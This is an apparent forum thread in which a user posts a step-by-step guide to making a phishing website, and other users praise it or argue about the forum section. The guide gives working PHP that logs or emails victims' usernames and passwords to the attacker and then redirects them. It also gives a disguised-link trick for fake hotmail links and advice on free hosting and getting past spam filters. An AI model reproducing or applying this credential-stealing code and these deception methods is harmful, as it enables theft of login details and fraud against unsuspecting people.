How to make a phishing website

[falarious]

Looked around to see if there was a guide and found nothing. I did find premade templates but I think it would be best to explain exactly how they work.

First off, let's point you to the wikipedia article on phishing since we don't need to repost all of it here: Phishing - Wikipedia, the free encyclopedia. You don't need to read this to follow this post, it's just a good reference.

Phishing is more or less all about stealing sensitive information from unknowing people by presenting them with a false/fake front to a popular or sensitive website and tricking them into thinking it's the real thing.

The most common phishing requests in NS&H are focused around myspace and hotmail or other email sites.

A better description:

From Phishing - Wikipedia, the free encyclopedia
In computing, phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. eBay and PayPal are two of the most targeted companies, and online banks are also common targets. Phishing is typically carried out using email or an instant message, and often directs users to a website, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.

How do I phish?

Now, how exactly do you phish someone? It involves a few steps:

1. Create a fake login or other information gathering page for the site you are impersonating
2. Host the phishing page
3. Trick a user into visiting the page
4. Cross your fingers and hope they login


Most people are looking for help with the first three steps.

Creating a Phishing Page

Creating a phishing page is easy but requires some knowledge of both HTML and a language you can use to script the "stealing" of information like javascript or PHP. Keep in mind your host will need to support PHP if you plan on using that.

You more or less go to the site you are impersonating and view the HTML source. In Firefox this can be done with View->Page Source and then cutting and pasting the code into a text editor.

From there, you'll want to edit the HTML code so that the references to images, scripts, etc. all point to the real site where they are hosted OR you'll want to download them all locally and reference them that way.

If someone wants to provide links to various pre-made phishing pages, feel free to post them and I'll add them to this post.

Once the page "looks" right, you'll want to go look at the HTML form that submits the login (or other information to the site). You need to edit this form so that instead of sending that information to the real site, it logs it to a file or emails you the information instead. This usually involves using a PHP script to handle the form submission. The PHP script will define what happens with the information the user submitted. You'll need to at least understand how to program very basic stuff and how to get help in case you don't understand how to do something.

Here is a quick code example:

Code:

<?php

// Save information to file.

  $performlogin = $_REQUEST['performlogin'];

  if ($performlogin == 1) 
  { 
    $file = "data.php";  //Free php host usualy doesn't allow other files then *.php.
    $fp = fopen($file, "a"); // Append to file.
     
    $data = $_POST['username'];
    fwrite($fp, "$data\r\n");

    $data = $_POST['password'];
    fwrite($fp, "$data\r\n");
         
    fclose($fp);
    }

// Send information to mail.

  if ($performlogin == 2)
  {
    $username = $_POST['username'];
    $password = $_POST['password'];
    $message = "Username: $username\r\nPassword: $password";
    @mail("[email protected]", "phising", $message) or die;
    }

    header("Location: http://www.targetsite.com/loginError"); // Redirect to error login page.
?>

Form:

Code:

<form action='form.php?performlogin=x' method='post'> // x = {1, 2}.
    <input type='text' name='username' />
    <input type='text' name='password' />
    <input type="submit" value="Submit">
</form>

Now you should have the HTML for the page you're faking looking just like the page itself, with all references to images and CSS being "fixed" so that they point to the right places and a form handling script that "steals" the user information when they try to use your fake site to login.

Hosting the Phishing Page

The next step is to host your phishing page somewhere online. Commonly used hosts are any free host that supports PHP. You don't need a lot of hard drive space from the host, so that doesn't matter.

Freewebs, geocities, whatever. Find a host you like and upload your page to it. If you're using PHP, again make sure the hosts supports PHP. If it doesn't, you'll need to find a different host or modify you phishing page to not use PHP.

Trick a User Into Visiting your Phishing Page

This can either be the easiest part or the hardest part, depending on your technical skills and the level of intelligence of the user you are trying to trick.

There are (or were) some exploits for common browsers that would allow a site to modify what the URL bar in the browser said so it could look very legitimate. I don't know the specifics, but someone else can elaborate.

That aside, you can spam disguised links in emails like this:

Code:

<a href="http://myhost.com/myphshingpage.php">http://www.hotmail.com</a>

where "hotmail.com" would be the site you are emulating.

Be warned that many spam filters notify users of this and modify the emails so the links are removed.

Another method is to send the same kind of link to people over various IM services, especially those that support HTML messages. This is less likely to get picked up by spam filters or other "protection" software.

Hope you guys like it! Enjoy!
If you have any questions, let me know.

[GunMan]

Wrong section/Repost. =P

[Tatertots]

How is this in the wrong section.... its a guide.

[falarious]

yeah thats what i was thinking too.

[Enfi]

WoW Guides Gold making guides, leveling guides and skill gaining guides for World of Warcraft.

wrong section :P

[Notahax]

Not wrong section.. Anything related to WoW is welcome here, but fits both in scam section and guide section :P

[Hyourin]

It is a repost, but if its all your works, then its pretty nice i must say, easy to understand etc.